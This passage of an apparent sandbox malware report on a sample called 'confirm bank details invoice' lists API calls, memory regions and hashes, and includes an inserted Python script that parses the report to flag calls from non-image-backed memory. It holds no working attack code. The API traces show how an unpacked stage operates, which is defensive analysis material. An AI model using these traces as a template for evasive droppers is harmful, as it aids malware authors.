                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                    • String ID:
                    • API String ID: 1046115767-0
                    • Opcode ID: 3ba2e6710614bea7b5dfc6181c7a357b315bfc0fd706527dafc002307fbeeb8d
                    • Instruction ID: 7dbe70f9dbfa899d43b5d36ea1568a22da46d85ffa2e18d5007443fe399cd764
                    • Opcode Fuzzy Hash: 3ba2e6710614bea7b5dfc6181c7a357b315bfc0fd706527dafc002307fbeeb8d
                    • Instruction Fuzzy Hash: 7911C2728056108ADF11FFA6C8423193E606F82339F26436AE4201F2F3CBBC9C0197AD
                    APIs
                      • Part of subcall function 0049395C: __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 0049395C: __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049395C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    • std::exception::exception.LIBCMT ref: 0048F51E
                    • __CxxThrowException@8.LIBCMT ref: 0048F533
                      • Part of subcall function 00496805: RaiseException.KERNEL32(?,?,0000000E,00526A30,?,?,?,0048F538,0000000E,00526A30,?,00000001), ref: 00496856
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 8e936113f2c07f46a098632562d3407892fa113bc1d8818ebcd093a0670bc72a
                    • Instruction ID: 7d701db73fd18e409095f7afa064ac0503db4fecd804c5bcf02aca373ee91c2b
                    • Opcode Fuzzy Hash: 8e936113f2c07f46a098632562d3407892fa113bc1d8818ebcd093a0670bc72a
                    • Instruction Fuzzy Hash: 8AF0A93150411EA7DB04BF99D8019EF7B989F05758F60443BF90491181DBB8A74497AD
                    APIs
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __lock_file.LIBCMT ref: 00493629
                      • Part of subcall function 00494E1C: __lock.LIBCMT ref: 00494E3F
                    • __fclose_nolock.LIBCMT ref: 00493634
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: ab36481ec9d03a228935a8a32f197d25ac6e75787020d9a26f16955a68feb848
                    • Instruction ID: 6f3dc99e293e1a22c8b39ca1351d1c565ae8de1ea024a596de657acaed83d357
                    • Opcode Fuzzy Hash: ab36481ec9d03a228935a8a32f197d25ac6e75787020d9a26f16955a68feb848
                    • Instruction Fuzzy Hash: 97F09632801214AADF21AF668802B5F7EA06F42739F26812FE411AB2C1C77C8E019B5D
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E959
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePeek
                    • String ID:
                    • API String ID: 2222842502-0
                    • Opcode ID: 82dc7a4e1bee50206662311e7e1955be1b002a20850f12935504502d1e867d89
                    • Instruction ID: f9ee8ac093400c504bf847f5281c57a8c991a5294cbacc96ebe39b082798914e
                    • Opcode Fuzzy Hash: 82dc7a4e1bee50206662311e7e1955be1b002a20850f12935504502d1e867d89
                    • Instruction Fuzzy Hash: 8271BB709047C09FEB26CF26C4447AB7BD0BB55308F084ABFD8895B361D3799889CB4A
                    APIs
                      • Part of subcall function 01340608: GetFileAttributesW.KERNELBASE(?), ref: 01340613
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01340EEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesCreateDirectoryFile
                    • String ID:
                    • API String ID: 3401506121-0
                    • Opcode ID: b02d5ba8c92bde3a8e172049db20f861a4cc2738b49edf6531c34fd173c8725e
                    • Instruction ID: 74dd5071a9bbc1395568a1a239c5ad94a1583bb8493f5b830cfec0848441843c
                    • Opcode Fuzzy Hash: b02d5ba8c92bde3a8e172049db20f861a4cc2738b49edf6531c34fd173c8725e
                    • Instruction Fuzzy Hash: 60517831A1120997EF14EFA4C844BEFB379EF58700F108569B609F7290EB799B44CB65
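The CreateProcessW/ExitProcess block and the GetFileAttributesW/CreateDirectoryW block above both resolve to the 0133F000 region and carry "based on PE: false", so the calls are made from memory that no image on disk backs, unlike the GetTempPathW/GetTempFileNameW function at 00470000, which belongs to the on-disk AutoIt host. The following script is an added example, not part of this Joe Sandbox report or its tooling: it parses function blocks in the layout shown on this page (the "APIs", "Memory Dump Source" and "Similarity" fields with their "•" bullets) and separates API calls made from non-PE-backed regions from those made by the mapped image. The embedded sample is constructed from three blocks copied from the listing above and trimmed to the fields the parser reads; the rule that a function block begins at each "APIs" header is an assumption taken from this page's layout.

```python
# Added example for this report (not Joe Sandbox code): parse the per-function
# analysis blocks shown on this page and separate API calls made from
# non-PE-backed memory from calls made by the on-disk image.
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three blocks copied from the listing above, trimmed to the
# fields the parser reads (indentation and "Download File" link residue dropped).
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01340D6D
• ExitProcess.KERNEL32(00000000), ref: 01340D8C
Memory Dump Source
• Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 004BC72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004BC746
Memory Dump Source
• Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
APIs
  • Part of subcall function 01340608: GetFileAttributesW.KERNELBASE(?), ref: 01340613
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 01340EEB
Memory Dump Source
• Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
Similarity
• API ID: AttributesCreateDirectoryFile
• String ID:
"""

# "Name.MODULE(args), ref: ADDR" or "Name.LIBCMT ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" for calls reached through a callee.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<parent>[0-9A-F]+):\s+)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
SOURCE_RE = re.compile(
    r"^•\s+Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<offset>[0-9A-F]+),"
    r"\s+based on PE:\s+(?P<pe>true|false)$"
)
FIELD_RE = re.compile(r"^•\s+(?P<key>API ID|String ID):\s*(?P<value>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# parent: address of the enclosing subcall function, or None for a direct call
ApiCall = namedtuple("ApiCall", "name module args ref parent")

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    pe_backed: Optional[bool] = None  # None when no Source File line was seen
    api_id: str = ""
    string_id: str = ""

    def api_names(self, include_subcalls: bool = False) -> List[str]:
        return [c.name for c in self.apis if include_subcalls or c.parent is None]

def parse_blocks(text: str) -> List[FunctionBlock]:
    """A function block starts at each 'APIs' header (assumed from this page's layout)."""
    blocks: List[FunctionBlock] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            section = "APIs"
        elif not line or current is None:  # blank, or tail of a block that began earlier
            continue
        elif line in SECTION_HEADERS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["parent"]))
        elif (m := SOURCE_RE.match(line)):
            current.source_file, current.offset = m["file"], m["offset"]
            current.pe_backed = m["pe"] == "true"
        elif (m := FIELD_RE.match(line)):
            setattr(current, m["key"].lower().replace(" ", "_"), m["value"].strip())
    return blocks

def non_pe_backed_calls(blocks):
    """(offset, direct API names) for functions in memory that no on-disk image backs."""
    return [(b.offset, b.api_names()) for b in blocks if b.pe_backed is False]

def find_api_chain(blocks, required):
    """Blocks whose direct API calls include every name in `required`."""
    return [b for b in blocks if set(required) <= set(b.api_names())]

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for offset, names in non_pe_backed_calls(parsed):
        print(f"non-PE-backed region {offset}: {', '.join(names)}")
    for b in find_api_chain(parsed, {"GetTempPathW", "GetTempFileNameW"}):
        print(f"temp file created by image at {b.offset}, name prefix {b.string_id!r}")
```

Subcall lines ("Part of subcall function ...") are kept but excluded from api_names() by default, so a chain match such as GetTempPathW plus GetTempFileNameW only fires on the function that makes both calls itself; pass include_subcalls=True to see the full reachable set. Run over the whole function list of a report, non_pe_backed_calls() gives a quick inventory of what the unpacked stage does without the AutoIt runtime's own CRT and UI functions in the way.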
                    APIs
                    • __flush.LIBCMT ref: 00492A0B
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __flush__getptd_noexit
                    • String ID:
                    • API String ID: 4101623367-0
                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                    • Instruction ID: 32fa037e0723e614d1586568b5dc3c5c11bd5285bcf66127adcbf6d1209be768
                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                    • Instruction Fuzzy Hash: 9C419571700706BFDF288EA9CA8056F7FA6AF45360F24853FE855C7240D6B8DD458B48
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: d32e2b8dd2a3ed343dae3082cc6817f8454443326cb7535949d6ff07679ab470
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 9131E870A00106DBC718EF5AC48096EFBE6FF49340B648AA6E409CB355DB34EDC5CB85
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: c36d41e103a3c3a0393b85176115f7a9fbaad2162c0ab082b1602ce8cc59318b
                    • Instruction ID: 4204f28bba0ea79ce15957b9ba8e8da74b83a855a7f123b3e3b716a1d350fd53
                    • Opcode Fuzzy Hash: c36d41e103a3c3a0393b85176115f7a9fbaad2162c0ab082b1602ce8cc59318b
                    • Instruction Fuzzy Hash: 7A315E75104524DFCB01EF11D0A1BAE7BB1FF49324F10885BEA951B386D778A906CF9A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 2e2020740287af48e2c32a7d0be254f601cd52c645ba99d057beda5a6996e33d
                    • Instruction ID: e2b3177124a91f6e0044209f9c648e723f9ee23f93eccfce969d198317eddde1
                    • Opcode Fuzzy Hash: 2e2020740287af48e2c32a7d0be254f601cd52c645ba99d057beda5a6996e33d
                    • Instruction Fuzzy Hash: 3B415E705046518FDB24DF19C444B1ABBE0BF45308F19899EE99A4B362C37AFC46CF56
                    APIs
                      • Part of subcall function 00474214: FreeLibrary.KERNEL32(00000000,?), ref: 00474247
                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004739FE,?,00000001), ref: 004741DB
                      • Part of subcall function 00474291: FreeLibrary.KERNEL32(00000000), ref: 004742C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Library$Free$Load
                    • String ID:
                    • API String ID: 2391024519-0
                    • Opcode ID: 1e1a2d091dc26341e014d3b0bb4074d115c4262e2fa88ac9ae34878422b7cc23
                    • Instruction ID: 1c5b76f00367e745a151bde2a5e0cdc646d65fc54180db8612c04e222875775b
                    • Opcode Fuzzy Hash: 1e1a2d091dc26341e014d3b0bb4074d115c4262e2fa88ac9ae34878422b7cc23
                    • Instruction Fuzzy Hash: B2119831700205AADF10AB75DC06BFE77A99F80748F10C46EB55AA61C2DB789A119B68
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a4f61d150d3662a10e48d0cbe765be36fd231166f6f044c5831e0971291a83a4
                    • Instruction ID: 17372833fb5c9150077befdee8e92c4c4c70ddeec9c72babc14071f5d83fabf3
                    • Opcode Fuzzy Hash: a4f61d150d3662a10e48d0cbe765be36fd231166f6f044c5831e0971291a83a4
                    • Instruction Fuzzy Hash: A32146705086018FDB24EF29C444A1FBBE1BF89308F14496EE99A47322C739F85ACF56
                    APIs
                    • ___lock_fhandle.LIBCMT ref: 0049AFC0
                      • Part of subcall function 00497BDA: __getptd_noexit.LIBCMT ref: 00497BDA
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit$___lock_fhandle
                    • String ID:
                    • API String ID: 1144279405-0
                    • Opcode ID: 8abdae171ad8ccc52017548ce7ba9e7fee92d1f65598ad568e8920f959179c4a
                    • Instruction ID: 66e7efa09ce88cf9818ea10a652857484d30a7c4afbd7ec2b9afc84fd1113d0b
                    • Opcode Fuzzy Hash: 8abdae171ad8ccc52017548ce7ba9e7fee92d1f65598ad568e8920f959179c4a
                    • Instruction Fuzzy Hash: AD11B6728146104BDF117FA5990275A3E60EF41339F16426AE4340B2E2D7BC9D109BEA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                    • Instruction ID: a9785c1ff9f502088b29672c70055d4f966b7c7ba358923213a7472043add32b
                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                    • Instruction Fuzzy Hash: 53018631500109AECF04EF65C8828FEBB78EF20344F00C06BB516971A5EB349A49DB68
                    APIs
                    • __lock_file.LIBCMT ref: 00492AED
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 71d9f5014592076cc1a56416258bbc525fa943090f811855314339f0a9c18f09
                    • Instruction ID: c3384e78077c419b81c5dcc18cb9a721512d7dd8752ef139f4bc1fb70943b5fd
                    • Opcode Fuzzy Hash: 71d9f5014592076cc1a56416258bbc525fa943090f811855314339f0a9c18f09
                    • Instruction Fuzzy Hash: FBF0C232500205BADF21AF668D0679F3EA1BF40318F15443BF4149A1A1D7BC8A12DB49
                    APIs
                    • FreeLibrary.KERNEL32(?,?,?,?,?,004739FE,?,00000001), ref: 00474286
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 71b7c31b63c980511e0136ef7f6d2f04cfe903a3e86883155336337c38c11e03
                    • Instruction ID: 4d1bc2c8991b85fed5e69fd743ce051378a5d0f78f6e696b193576ddfcbc4fd8
                    • Opcode Fuzzy Hash: 71b7c31b63c980511e0136ef7f6d2f04cfe903a3e86883155336337c38c11e03
                    • Instruction Fuzzy Hash: C5F08C70404301DFCB348F60D480862BBE4AF44365320CABFF1DA82611C7359860CB49
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004740C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LongNamePath
                    • String ID:
                    • API String ID: 82841172-0
                    • Opcode ID: 4ca94665d4d2f96c58934624211cf351b73af4a0b5635e6890b5f51b73dd6085
                    • Instruction ID: 0dff38657207ae53e1d4aa01350b5ceea960e5969e88031c0bd82bdc29a607f0
                    • Opcode Fuzzy Hash: 4ca94665d4d2f96c58934624211cf351b73af4a0b5635e6890b5f51b73dd6085
                    • Instruction Fuzzy Hash: 2CE07D329001241BC711E354CC42FFA379DDF88694F050075F908D3204DA64D9808694
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 01340613
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction ID: 2e7092284a39f96586333d4b3c0b4b498b218758c28a9c4ec41a8648cd92465c
                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction Fuzzy Hash: DDE0863060510CDBDB18CABC89046E973E8E744334F204654FA07C31C0D538A900D690
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 013405E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction ID: fb0ac2f5f3eb32f03e5f5e14d5888d65445d7d2743cae647ecec780d78659874
                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction Fuzzy Hash: AFD0A730A4920CEBCB10CFBC9D089DD77ECE705364F004794FE15C3280D535A9009790
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
